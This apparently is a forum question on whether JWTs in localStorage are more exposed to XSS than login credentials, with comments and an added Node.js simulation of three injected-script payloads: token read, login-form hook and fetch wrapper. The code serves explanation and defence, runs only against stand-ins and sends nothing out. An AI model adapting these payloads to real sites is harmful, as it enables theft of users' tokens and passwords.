
I am struggling to decide which authentication strategy to adopt for a critical MVP I am working on.

Initially I was thinking about stateful JWT (Yes I know it is stateful, my API will not be RESTful and I will burn in hell :) ). The main point I liked about JWT with respect to old-style sessions (using an HTTPOnly cookie for storage) was that I could have used the same authentication strategy for all my clients (i.e. my single page app, mobile app, third party, etc. all putting the token in the Authorization field of the HTTP header).

Then I read tons of material about JWT authentication and JWT itself including:

  1. This stackoverflow question
  2. This great explanation of jwt (jws/jwe) from medium
  3. This nice article about authentication best practices
  4. These articles 1, 2, 3 from different sources strongly suggesting not to use JWT as an authentication method for web applications.

So, I ended up with a strong skepticism about using JWT authentication for the web app, due to the lack of a secure storage mechanism in the browser (local/session storage are easily accessible to XSS attackers).

Storing the JWT token in an HTTPOnly cookie is also a no-go for me, since I would lose the benefit I previously mentioned about JWT and I would get several overheads (increased request size, just to mention one) as explained in the articles cited at point 4 above.

Nonetheless one point that came out in the comments of the link at point 1 is still preventing me from getting rid of the idea of using JWT as the only authentication method, that is:

I do not see why stealing a JWT token from local/session storage should be easier for an XSS attacker than stealing user credentials directly from the login form, can anyone clarify this point?

In case the answer to the previous question should be that it is somehow much easier to steal data from the local/session storage, then another question follows:

If I use a JS variable or some other non-persistent approach to store the JWT token (so I accept requiring users to re-login every time they refresh the page or close the browser), is there any option to gain something in terms of XSS protection with respect to local/session storage?

Any qualified answer will be extremely appreciated.

Steffen Moritz
Andrea Citrolo
  • The JWT persists in local storage, so an XSS attack stealing the token can happen anywhere after the user is logged in. For an XSS to happen exactly when the user is logging in to steal the password ... I'm no expert but I find it hard to imagine how that is going to happen. Maybe by logging key strokes, okay, but it is very restricted where that XSS has to happen, whereas stealing something from local storage can happen anywhere, any time after the user has logged in. So I'd say stealing the JWT is a much wider attack surface. – TheGreatContini Jul 22 '19 at 01:49
  • Yes I see this point, that is valid, but I think most of the time once the attacker is able to inject some JavaScript code he/she can also track the request content, so even the limited time window is not a huge plus in terms of security; it just delays the exploit to the next login after the attack has succeeded. – Andrea Citrolo Jul 27 '19 at 14:26
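The two questions above and the comment exchange can be made concrete. The following is an added example, not code from the question or from any of the linked articles: a Node script that simulates a page with (A) a token in localStorage and (B) a token held only in a closure variable, then runs three injected-script payloads against it. window.localStorage, the login form and fetch() are replaced by constructed stand-ins so the script runs offline; the function names, the "alice"/"hunter2" credentials and the `jwt-for-alice` token string are hypothetical, and the attacker logic is what an XSS payload would do against the real objects.

```javascript
// Added example (not part of the original question): three XSS payloads against two token stores.
// Browser objects are replaced by constructed stand-ins so this runs under Node.

const exfiltrated = [];                         // what the injected script managed to send home
const exfil = (kind, value) => exfiltrated.push({ kind, value });

// --- stand-ins for browser objects (constructed) ---
const pageStorage = new Map();                  // stand-in for window.localStorage
const submitListeners = [];                     // stand-in for the login form's submit listeners
const loginForm = {
  addEventListener: (_type, fn) => submitListeners.push(fn),
  submit: (username, password) => submitListeners.forEach(fn => fn({ username, password })),
};
const pristineFetch = (_url, opts) => ({ status: 200, authorization: opts.headers.Authorization });
let fetchImpl = pristineFetch;
const win = {                                   // stand-in for window; fetch is replaceable, as in a browser
  get fetch() { return fetchImpl; },
  set fetch(f) { fetchImpl = f; },
};
// Hypothetical auth server: returns an opaque string instead of a real signed JWT.
const issueToken = (username, _password) => `jwt-for-${username}`;

// --- the application's own code ---
// Store A: token in localStorage, sent as a bearer header (the "JWT auth" option in the question).
function loginWithStorage(username, password) {
  pageStorage.set('jwt', issueToken(username, password));
}
function apiCallWithStorage(url) {
  return win.fetch(url, { headers: { Authorization: `Bearer ${pageStorage.get('jwt')}` } });
}

// Store B: token kept only in a closure (the "JS variable" option in the question).
// Nothing on window or in storage points at it, and it is lost on page reload.
const memoryClient = (() => {
  let token = null;
  return {
    login(username, password) { token = issueToken(username, password); },
    call(url) { return win.fetch(url, { headers: { Authorization: `Bearer ${token}` } }); },
  };
})();

// --- the attacker's injected script, three variants ---
// 1. Against store A: read the token directly. Works at any moment after login, no user action needed.
function xssReadStorage() {
  const t = pageStorage.get('jwt');
  if (t) exfil('token', t);
  return t;
}
// 2. Against the login form: only pays off if the victim logs in while the payload is on the page.
function xssHookLoginForm() {
  loginForm.addEventListener('submit', e => exfil('credentials', `${e.username}:${e.password}`));
}
// 3. Against store B: the variable itself is unreachable, but the token must leave the page in a
//    request, so wrapping fetch captures the Authorization header of the victim's next API call.
function xssHookFetch() {
  const realFetch = win.fetch;
  win.fetch = (url, opts) => {
    exfil('header', opts.headers.Authorization);
    return realFetch(url, opts);
  };
}

// Timeline: the victim logged in earlier; the XSS payload lands on an already-authenticated page.
function runScenario() {
  exfiltrated.length = 0; submitListeners.length = 0; pageStorage.clear(); fetchImpl = pristineFetch;
  loginWithStorage('alice', 'hunter2');
  memoryClient.login('alice', 'hunter2');

  const fromStorage = xssReadStorage();          // immediate hit, before the victim does anything
  xssHookLoginForm();
  const afterFormHook = exfiltrated.length;      // still 1: no login is happening right now
  const directRead = memoryClient.token;         // undefined: the closure variable is not reachable

  xssHookFetch();
  memoryClient.call('/api/profile');             // the victim's next API call leaks the header
  apiCallWithStorage('/api/profile');
  loginForm.submit('alice', 'hunter2');          // the form hook only pays off at the next login
  return { fromStorage, afterFormHook, directRead, leaked: exfiltrated.map(e => e.kind) };
}

console.log(runScenario());
```

Running it shows the asymmetry the comments argue about: the localStorage read succeeds the instant the payload runs, the form hook yields nothing until the victim logs in again, and the closure variable cannot be read directly but leaks on the very next request because the same origin's script can replace `fetch` (or `XMLHttpRequest.prototype.open`/`send`) before the app calls it. A non-persistent store therefore shortens the token's lifetime on the page and removes the "steal it any time later" path, but it does not protect a token from a script that is already executing in the same origin.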
